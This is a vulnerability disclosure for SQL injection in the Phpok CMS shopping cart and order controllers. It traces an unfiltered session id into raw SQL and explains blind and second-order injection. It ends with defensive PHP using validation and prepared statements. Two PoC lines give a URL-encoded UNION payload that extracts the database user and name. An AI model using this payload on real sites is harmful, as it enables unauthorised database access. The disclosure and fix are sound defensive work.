Phpok latest SQL injection and packaging
The site loads several resource engines during initialization; the file-based session engine (framework/engine/session/file.php) is loaded for session initialization.
File framework/engine/session/file.php:

    function __construct($config){
        if(!$config || !is_array($config)){
            $config["id"] = "PHPSESSID";
            $config["path"] = "./data/session/";
            $config["timeout"] = 3600;
        }
        $this->config($config);
        $sid = $config["id"] ? $config["id"] : "PHPSESSION";
        session_name($sid);
        $this->sid = $sid;
        $session_id = isset($_POST[$sid]) ? $_POST[$sid] : (isset($_GET[$sid]) ? $_GET[$sid] : "");
        if($session_id){
            session_id($session_id);
            $this->sessid = $session_id;
        }else{
            $this->sessid = session_id();
        }
        session_save_path($config["path"]);
        $this->config = $config;
        $this->timeout = $config["timeout"] ? $config["timeout"] : 600;
        session_cache_expire(intval($this->timeout)/60);
        session_cache_limiter('public');
        session_start();
    }
    $session_id = isset($_POST[$sid]) ? $_POST[$sid] : (isset($_GET[$sid]) ? $_GET[$sid] : "");

Here, $session_id is taken directly from GET or POST without any filtering.

    $this->sessid = $session_id;

It is then stored in $this->sessid.
Look at the file framework/www/cart_control.php:
    function __construct(){
        parent::control();
        // obtain the current shopping cart ID
        $this->cart_id = $this->model('cart')->cart_id($this->session->sessid(), $_SESSION['user_id']);
    }

Here, a cart_id method is called. Its first parameter is $this->session->sessid():

    function sessid($sid=""){
        if($sid) $this->sessid = $sid;
        return $this->sessid;
    }

We can see that $this->session->sessid() is simply the $session_id value obtained earlier.
Look at the cart_id method.
    function cart_id($sessid, $uid = 0){
        if(!$sessid) return false;
        $sql = "SELECT id FROM ".$this->db->prefix."cart WHERE session_id='".$sessid."'";
        $rs = $this->db->get_one($sql);
        if(!$rs){
            $array = array('session_id' => $sessid, 'user_id' => $uid, 'addtime' => $this->time);
            $id = $this->db->insert_array($array, 'cart');
        }else{
            $id = $rs['id'];
        }
        // if the visitor is already a member
        if($uid){
            $sql = "SELECT id FROM ".$this->db->prefix."cart WHERE user_id='".$uid."'";
            $rs = $this->db->get_one($sql);
            if($rs && $rs['id'] != $id){
                // merge the shopping cart product information
                $this->cart_merge($rs['id'], $id);
                // delete the old shopping cart information
                $this->delete($rs['id']);
            }
            // update the shopping cart attributes
            $sql = "UPDATE ".$this->db->prefix."cart SET user_id='".$uid."' WHERE id='".$id."'";
            $this->db->query($sql);
        }
        return $id;
    }

In $sql = "SELECT id FROM ".$this->db->prefix."cart WHERE session_id='".$sessid."'"; the value of $sessid is concatenated directly into the SQL statement. If magic_quotes_gpc is not enabled, SQL injection is possible. However, the query result is not echoed and error display is disabled, so time-based blind injection would be needed. Alternatively, second-order injection can be used, as shown below:
In cart_control.php:
    function index_f(){
        // get the shopping cart list
        $rslist = $this->model('cart')->get_all($this->cart_id);
    }
    function checkout_f(){
        // echo "<pre>".print_r($this->site, true)."</pre>";
        $rslist = $this->model('cart')->get_all($this->cart_id);
    }

Both call $this->model('cart')->get_all($this->cart_id):

    function get_all($cart_id){
        if(!$cart_id) return false;
        $sql = "SELECT * FROM ".$this->db->prefix."cart_product WHERE cart_id='".$cart_id."'";
        $rslist = $this->db->get_all($sql);
        if(!$rslist) return false;
        foreach($rslist AS $key => $value){
            // skip entries without a product id
            if(!$value['tid']) continue;
            $arc_rs = $this->call->phpok("_arc", array("id" => $value['tid']));
            if($arc_rs){
                $value = array_merge($arc_rs, $value);
                $rslist[$key] = $value;
            }
        }
        return $rslist;
    }

We can see that $cart_id is concatenated into the SQL statement here as well, so second-order injection is possible.
Poc: index.php?c=cart&PHPSESSION=%27%20union%20select%20%27%5C%27%20union%20select%201%2C2%2C3%2Cuser%28%29%2C5%2Cdatabase%28%29%2C7%23%27%23
The same vulnerability also exists in order_control.php:
    class order_control extends phpok_control {
        function __construct(){
            parent::control();
            // obtain the current shopping cart ID
            $this->cart_id = $this->model('cart')->cart_id($this->session->sessid(), $_SESSION['user_id']);
        }
        // same problem, same principle: the value goes straight into the database
        function create_f(){
            $rslist = $this->model('cart')->get_all($this->cart_id);
            // second-order injection can be performed here
        }
    }
poc:index.php?c=cart&PHPSESSION=%27%20union%20select%20%27%5C%27%20union%20select%201%2C2%2C3%2Cuser%28%29%2C5%2Cdatabase%28%29%2C7%23%27%23
Solution:
Filter
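As an added illustration of that fix (this is example code, not Phpok's own), the two weak spots above rewritten defensively: the session id read from the request is validated against the character set PHP itself uses for session ids, and the cart queries are parameterised so the value never becomes part of the SQL text. It assumes a PDO connection and the same cart / cart_product tables; the length bounds and the helper names are assumptions.

```php
<?php
// Added example, not Phpok's own code. Assumes a PDO connection ($pdo) and
// the same "{prefix}cart" / "{prefix}cart_product" tables as the original.

// 1. Only accept a client-supplied session id that looks like one PHP would
//    generate: characters [a-zA-Z0-9,-], bounded length (bounds assumed).
function safe_session_id(string $candidate): ?string
{
    return preg_match('/^[a-zA-Z0-9,-]{22,256}$/', $candidate) === 1 ? $candidate : null;
}

// Replacement for the raw $_POST/$_GET read in session/file.php.
// Anything that fails validation is ignored and PHP generates its own id.
function session_id_from_request(string $sid): string
{
    $raw   = $_POST[$sid] ?? $_GET[$sid] ?? '';
    $clean = is_string($raw) ? safe_session_id($raw) : null;
    if ($clean === null) {
        return session_id() ?: '';
    }
    session_id($clean);
    return $clean;
}

// 2. Parameterised lookup. $prefix is a config value, not user input.
//    The returned id is cast to int, so the second query (get_all) can only
//    ever see a number, which closes the second-order path as well.
function cart_id(PDO $pdo, string $prefix, string $sessid, int $uid = 0): int
{
    $stmt = $pdo->prepare("SELECT id FROM {$prefix}cart WHERE session_id = ?");
    $stmt->execute([$sessid]);
    $id = $stmt->fetchColumn();
    if ($id === false) {
        $ins = $pdo->prepare(
            "INSERT INTO {$prefix}cart (session_id, user_id, addtime) VALUES (?, ?, ?)"
        );
        $ins->execute([$sessid, $uid, time()]);
        $id = $pdo->lastInsertId();
    }
    return (int) $id;
}

function get_all(PDO $pdo, string $prefix, int $cart_id): array
{
    $stmt = $pdo->prepare("SELECT * FROM {$prefix}cart_product WHERE cart_id = ?");
    $stmt->execute([$cart_id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

With this in place the PoC value above fails the regex in safe_session_id() and is never used as a session id, and even a value that slipped through would be bound as data rather than spliced into the query.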